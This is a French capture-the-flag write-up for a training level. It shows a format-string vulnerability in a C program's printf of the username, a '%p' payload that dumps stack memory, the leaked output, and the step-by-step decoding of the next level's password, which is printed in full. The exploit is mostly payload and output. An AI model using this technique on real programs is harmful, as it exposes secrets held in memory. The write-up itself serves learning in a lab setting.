1) Transfert du fichier avec SCP en utilisant un port spécifié :
    scp -P 22222 level01@localhost:/home/users/level01/level01 .


2) On inverse le binaire et on analyse le code, on voit qu il ouvre le fichier de password du user level03, le lit et le stock dans un buffer mais le code ne contient pas de buffer overflow possible, par contre la partie suivante attire notre attention :

    if (strncmp(password_buffer, input_password, 41) == 0) {
            printf("Greetings, %s!\n", input_username);
            system("/bin/sh");  // Accès au shell si le mot de passe est correct
            return 0;
        } else {
            printf("%s does not have access!\n", input_username);
            exit(1);
        }
   si la comparaison echoue, un printf se declenche afin d'imprimer l'input username, une attaque par printformat est possible grace au printf, ce qui nous permettra peut-etre de lire le mot de passe du user level03

3) on peut donc lire dans la stack grace au flag "%p" : 

    --[ Username: %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
    --[ Password: *****************************************
    0x7fffffffe500 (nil) 0x25 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6f8 0x1f7ff9a08 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025 (nil) (nil) (nil) (nil) (nil) 0x100000000 
    (nil) 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d (nil) 
    0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!

4) on peut convertir ces adresses en ASCII en prenant le soin de retirer le "0x" jusqu'a ce qu'on tombe sur des valeurs ASCII interessantes et comme l'elf est en little endian, il faut inverser les valeurs: 
    - 756e505234376848 ==> unPR47hH => Hh74RPnu
    - 45414a3561733951 ==> EAJ5as9Q => Q9sa5JAE
    - 377a7143574e6758 ==> 7zqCWNgX => XgNWCqz7
    - 354a35686e475873 ==> 5J5hnGXs => sXGnh5J5
    - 48336750664b394d ==> H3gPfK9M => M9KfPg3H


5) On concatene le tout et on obient notre flag : Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H